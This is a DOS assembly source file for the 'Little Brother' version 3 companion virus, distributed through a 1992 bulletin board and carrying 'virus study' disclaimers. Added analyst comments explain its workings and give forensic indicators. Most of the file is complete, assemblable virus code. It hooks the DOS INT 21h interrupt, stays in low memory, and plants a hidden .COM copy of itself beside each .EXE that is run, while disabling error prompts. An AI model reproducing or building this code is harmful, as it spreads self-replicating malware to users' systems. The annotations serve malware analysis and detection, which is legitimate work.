Assembly Source File  |  1992-10-11  |  12KB  |  309 lines

  1. ;****************************************************************************;
  2. ;                                                                            ;
  3. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  4. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  5. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  6. ;                     -=]                            [=-                     ;
  7. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  8. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  9. ;                     -=]                            [=-                     ;
  10. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  11. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  12. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  13. ;                                                                            ;
  14. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  15. ;                                                                            ;
  16. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  17. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  18. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  19. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  20. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  21. ; Is. Keep This Code in Responsible Hands!                                   ;
  22. ;                                                                            ;
  23. ;****************************************************************************;
  24. ;****************************************************************************
  25. ;*  Little Brother    version 3
  26. ;*
  27. ;*  Compile with MASM 4.0
  28. ;*  (other assemblers will probably not produce the same result)
  29. ;*
  30. ;*  Disclaimer:
  31. ;*  This file is only for educational purposes. The author takes no
  32. ;*  responsibility for anything anyone does with this file. Do not
  33. ;*  modify this file!
  34. ;****************************************************************************
  35.  
  36. cseg            segment
  37.                 assume  cs:cseg,ds:cseg,es:nothing
  38.  
  39.                 .RADIX  16                      ;analysis note: every unsuffixed literal below is hexadecimal ("int 21" is INT 21h, "mov sp,300" loads 300h)
  40.  
  41. FILELEN         equ     end - begin             ;byte count of the image between the begin and end labels
  42. oi21            equ     end                     ;dword just past the image: holds the saved original INT 21h vector
  43. nameptr         equ     end+4                   ;next dword: far pointer to the ASCIIZ filename currently being handled
  44.  
  45.  
  46. ;****************************************************************************
  47. ;*              Install the program!
      ;*
      ;*  Analyst summary (entry point of the .COM image, loaded at offset 100h):
      ;*   1. Copies FILELEN bytes of itself from DS:0100 to 0044:0100
      ;*      (linear 00540h), outside this process's memory block.
      ;*   2. Reads the INT 21h vector from 0000:0084. If its offset word already
      ;*      equals the offset of ni21 the hook is treated as installed (only
      ;*      the offset is compared, not the segment). Otherwise the old vector
      ;*      is saved at 0044:oi21 and INT 21h is pointed at 0044:ni21.
      ;*   3. Shrinks its own block to 30h paragraphs, locates its own path
      ;*      after the environment strings, rewrites the extension to EXE,
      ;*      EXECs that file and exits with the child's return code.
      ;*  The process ends with function 4Ch, not a TSR call; the hook remains
      ;*  because the handler code is the copy at segment 0044h.
      ;*  Memory-forensics indicator: INT 21h vector whose segment is 0044h.
  48. ;****************************************************************************
  49.  
  50.                 org     100h
  51.  
  52. begin:          cld
  53.                 mov     sp,300                  ;stack top at offset 300h = the 30h paragraphs kept by the resize below
  54.  
  55.                 mov     ax,0044h                ;move program to empty hole
  56.                 mov     es,ax
  57.                 mov     di,0100h
  58.                 mov     si,di
  59.                 mov     cx,FILELEN
  60.         rep     movsb
  61.  
  62.                 mov     ds,cx                   ;get original int21 vector
  63.                 mov     si,0084h                ;DS = 0 (CX is 0 after rep movsb); 0084h = 4 * 21h, the IVT slot for INT 21h
  64.                 mov     di,offset oi21
  65.                 mov     dx,offset ni21
  66.                 lodsw                           ;AX = offset word of the current INT 21h vector
  67.                 cmp     ax,dx                   ;already installed?
  68.                 je      cancel
  69.                 stosw                           ;old offset  -> 0044:oi21
  70.                 movsw                           ;old segment -> 0044:oi21+2
  71.  
  72.                 push    es                      ;set vector to new handler
  73.                 pop     ds
  74.                 mov     ax,2521h                ;DOS 25h, AL=21h: set INT 21h vector to DS:DX = 0044:ni21
  75.                 int     21h
  76.  
  77. cancel:         push    cs                      ;restore segment registers
  78.                 pop     ds
  79.                 push    cs
  80.                 pop     es
  81.  
  82.                 mov     bx,30                   ;free memory
  83.                 mov     ah,4A                   ;DOS 4Ah: resize the block at ES to BX = 30h paragraphs (300h bytes)
  84.                 int     21
  85.  
  86.                 mov     es,ds:[002C]            ;search filename in environment
  87.                 mov     di,0
  88.                 mov     ch,0FFh                 ;CX >= 0FF00h: scan length is effectively unbounded
  89.                 mov     al,01                   ;looks for the 01h of the count word DOS 3+ stores after the environment strings - presumably; confirm on the DOS version under analysis
  90.         repnz   scasb
  91.                 inc     di                      ;skip the high byte of that word: ES:DI -> this program's own path
  92.  
  93.                 mov     word ptr [nameptr],di
  94.                 mov     word ptr [nameptr+2],es
  95.                 
  96.                 mov     si,offset EXE_txt       ;change extension to .EXE
  97.                 call    change_ext
  98.  
  99.                 push    cs
  100.                 pop     es
  101.                 mov     bx,offset param         ;make EXEC param. block
  102.                 mov     [bx+4],cs               ;segment of command-tail pointer
  103.                 mov     [bx+8],cs               ;segment of first FCB pointer
  104.                 mov     [bx+0C],cs              ;segment of second FCB pointer
  105.                 lds     dx,dword ptr [nameptr]  ;DS:DX = own path, extension now EXE
  106.                 mov     ax,4B00                 ;execute .EXE program
  107.                 int     21
  108.                 mov     ah,4Dh                  ;ask return code
  109.                 int     21
  110.                 mov     ah,4Ch                  ;exit with same return code
  111.                 int     21
  112.  
  113.  
  114. ;****************************************************************************
  115. ;*              EXEC parameter block
       ;*
       ;*  Seven words passed in ES:BX to INT 21h AX=4B00h by the install code:
       ;*    word 0      environment segment, 0 here
       ;*    words 1-2   far pointer, offset 80h (command tail)
       ;*    words 3-4   far pointer, offset 5Ch (first FCB)
       ;*    words 5-6   far pointer, offset 6Ch (second FCB)
       ;*  The three "?" segment words are filled with CS at run time, so the
       ;*  launched .EXE is handed this process's own command tail and FCBs.
  116. ;****************************************************************************
  117.  
  118. param           dw      0, 80, ?, 5C, ?, 6C, ?
  119.  
  120.  
  121. ;****************************************************************************
  122. ;*              File-extensions
       ;*
       ;*  Each entry is exactly 4 bytes (three characters plus NUL) because
       ;*  change_ext copies it with two movsw. infect compares the first three
       ;*  bytes of EXE_txt byte-for-byte against the end of the EXEC filename.
  123. ;****************************************************************************
  124.  
  125. EXE_txt         db      'EXE',0
  126. COM_txt         db      'COM',0
  127.  
  128.  
  129. ;****************************************************************************
  130. ;*              Interrupt handler 24
       ;*
       ;*  Replacement critical-error (INT 24h) handler, installed by infect only
       ;*  for the duration of its file operations. It returns AL=03, the
       ;*  "fail the call" action code (DOS 3.1+), so a disk error while the
       ;*  companion file is being written raises no Abort/Retry/Fail prompt.
  131. ;****************************************************************************
  132.  
  133. ni24:           mov     al,03
  134.                 iret
  135.  
  136.  
  137. ;****************************************************************************
  138. ;*              Interrupt handler 21
       ;*
       ;*  Resident INT 21h hook. Only AX=4B00h (load and execute) is acted on:
       ;*  for that call infect runs first with the caller's DS:DX filename.
       ;*  Every call, matched or not, is then passed unchanged to the original
       ;*  handler through the far pointer saved at cs:[oi21].
       ;*  Flags, DX, BX, AX, DS and ES are saved and restored around the check.
  139. ;****************************************************************************
  140.  
  141. ni21:           pushf
  142.                 push    dx
  143.                 push    bx
  144.                 push    ax
  145.                 push    ds
  146.                 push    es
  147.  
  148.                 cmp     ax,4B00h                ;execute ?
  149.                 jne     exit
  150.  
  151. doit:           call    infect
  152.  
  153. exit:           pop     es
  154.                 pop     ds
  155.                 pop     ax
  156.                 pop     bx
  157.                 pop     dx
  158.                 popf
  159.  
  160.                 jmp     dword ptr cs:[oi21]     ;call to old int-handler
  161.  
  162.  
  163. ;****************************************************************************
  164. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
       ;*
       ;*  Analyst summary: this is a companion dropper; the target .EXE itself
       ;*  is never opened or modified.
       ;*   - Returns at once unless the last three characters of the name
       ;*     are 'EXE'.
       ;*   - Rewrites those characters to 'COM' inside the caller's buffer,
       ;*     creates that file with function 5Bh (which fails if it already
       ;*     exists), writes FILELEN bytes starting at begin, closes it, and
       ;*     deletes it again if the write came up short.
       ;*   - Ctrl-Break checking is switched off and INT 24h is pointed at ni24
       ;*     while this runs; both are restored at return1, and the name is put
       ;*     back to 'EXE' before returning.
       ;*  On-disk indicators: a .COM file beside an .EXE of the same base name,
       ;*  FILELEN bytes long, created with no attribute bits set, containing
       ;*  the text 'Little Brother'.
  165. ;****************************************************************************
  166.  
  167. infect:         cld
  168.  
  169.                 mov     word ptr cs:[nameptr],dx  ;save the ptr to the filename
  170.                 mov     word ptr cs:[nameptr+2],ds
  171.  
  172.                 push    cs
  173.                 pop     ds
  174.                 call    searchpoint             ;ES:DI -> first character of the extension
  175.                 mov     si,offset EXE_txt       ;is extension 'EXE'?
  176.                 mov     cx,3
  177.         rep     cmpsb
  178.                 jnz     return                  ;any other extension: nothing is touched
  179.  
  180.                 mov     si,offset COM_txt       ;change extension to COM
  181.                 call    change_ext
  182.  
  183.                 mov     ax,3300h                ;get ctrl-break flag
  184.                 int     21
  185.                 push    dx                      ;DL = current break setting, kept for the restore at return1
  186.  
  187.                 cwd                             ;clear the flag
  188.                 inc     ax                      ;AX = 3301h: set break flag from DL, which cwd made 0
  189.                 push    ax                      ;3301h is reused at return1
  190.                 int     21
  191.  
  192.                 mov     ax,3524h                ;get int24 vector
  193.                 int     21
  194.                 push    bx                      ;old INT 24h offset
  195.                 push    es                      ;old INT 24h segment
  196.  
  197.                 push    cs                      ;set int24 vec to new handler
  198.                 pop     ds
  199.                 mov     dx,offset ni24
  200.                 mov     ah,25h                  ;relies on AL still holding 24h from the 3524h call: AX = 2524h
  201.                 push    ax                      ;2524h is reused at return1
  202.                 int     21
  203.  
  204.                 lds     dx,dword ptr [nameptr]  ;create the virus (unique name)
  205.                 xor     cx,cx                   ;CX = 0: file is created with no attribute bits set
  206.                 mov     ah,5Bh                  ;DOS 5Bh: create new file, error if the name already exists
  207.                 int     21
  208.                 jc      return1                 ;create refused (e.g. a same-named .COM is already there)
  209.                 xchg    bx,ax                   ;save handle
  210.  
  211.                 push    cs
  212.                 pop     ds
  213.                 mov     cx,FILELEN              ;write the virus
  214.                 mov     dx,offset begin
  215.                 mov     ah,40h
  216.                 int     21
  217.                 cmp     ax,cx                   ;bytes written vs. bytes requested
  218.                 pushf                           ;keep the comparison result across the close call
  219.  
  220.                 mov     ah,3Eh                  ;close the file
  221.                 int     21
  222.  
  223.                 popf
  224.                 jz      return1                 ;all bytes written?
  225.  
  226.                 lds     dx,dword ptr [nameptr]  ;no, delete the virus
  227.                 mov     ah,41h
  228.                 int     21
  229.  
  230. return1:        pop     ax                      ;restore int24 vector
  231.                 pop     ds                      ;saved INT 24h segment
  232.                 pop     dx                      ;saved INT 24h offset
  233.                 int     21
  234.  
  235.                 pop     ax                      ;restore ctrl-break flag
  236.                 pop     dx                      ;DL = break setting read at entry
  237.                 int     21
  238.  
  239.                 mov     si,offset EXE_txt       ;change extension to EXE
  240.                 call    change_ext              ;execute .EXE program
  241.  
  242. return:         ret
  243.  
  244.  
  245. ;****************************************************************************
  246. ;*              change the extension of the filename (CS:SI -> ext)
       ;*
       ;*  Overwrites the last three characters and the terminating NUL of the
       ;*  name at cs:[nameptr] with the four bytes at CS:SI. The write goes into
       ;*  whatever buffer nameptr refers to: the caller's EXEC path when reached
       ;*  from infect, or this process's environment block when reached from
       ;*  the install code.
       ;*  Leaves DS = CS; SI and DI advance by 4; ES, CX and AL are changed by
       ;*  searchpoint.
  247. ;****************************************************************************
  248.  
  249. change_ext:     call    searchpoint
  250.                 push    cs
  251.                 pop     ds
  252.                 movsw
  253.                 movsw
  254.                 ret
  255.  
  256.  
  257. ;****************************************************************************
  258. ;*              search begin of extension  
       ;*
       ;*  Loads ES:DI from cs:[nameptr], scans forward for the terminating NUL
       ;*  and backs up 4 bytes from the position after it, so ES:DI ends on the
       ;*  third character before the NUL. That is the first extension character
       ;*  only if the name ends in a three-character extension; no check for a
       ;*  '.' is made.
  259. ;****************************************************************************
  260.  
  261. searchpoint:    les     di,dword ptr cs:[nameptr]
  262.                 mov     ch,0FFh                 ;only CH is set: the scan limit is at least 0FF00h bytes
  263.                 mov     al,0
  264.         repnz   scasb                           ;stops with DI one past the NUL
  265.                 sub     di,4
  266.                 ret
  267.  
  268.  
  269. ;****************************************************************************
  270. ;*              Text and Signature
       ;*
       ;*  Plain-text marker placed before the end label, so it lies inside the
       ;*  FILELEN bytes: it is present in the copy at segment 0044h and in every
       ;*  file written by infect, which makes it a simple scan string.
  271. ;****************************************************************************
  272.  
  273.                 db      'Little Brother',0
  274.  
  275. end:                                            ;image ends here; oi21 and nameptr are equated to end and end+4, outside the FILELEN bytes
  276.  
  277. cseg            ends
  278.                 end     begin
  279.  
  280. ;****************************************************************************;
  281. ;                                                                            ;
  282. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  283. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  284. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  285. ;                     -=]                            [=-                     ;
  286. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  287. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  288. ;                     -=]                            [=-                     ;
  289. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  290. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  291. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  292. ;                                                                            ;
  293. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  294. ;                                                                            ;
  295. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  296. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  297. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  298. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  299. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  300. ; Is. Keep This Code in Responsible Hands!                                   ;
  301. ;                                                                            ;
  302. ;****************************************************************************;
  303.  
  304. ;─────────────────────────────────────────────────────────────────────────;
  305. ;──────────────────> and Remember Don't Forget to Call <──────────────────;
  306. ;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
  307. ;─────────────────────────────────────────────────────────────────────────;
  308.  
  309.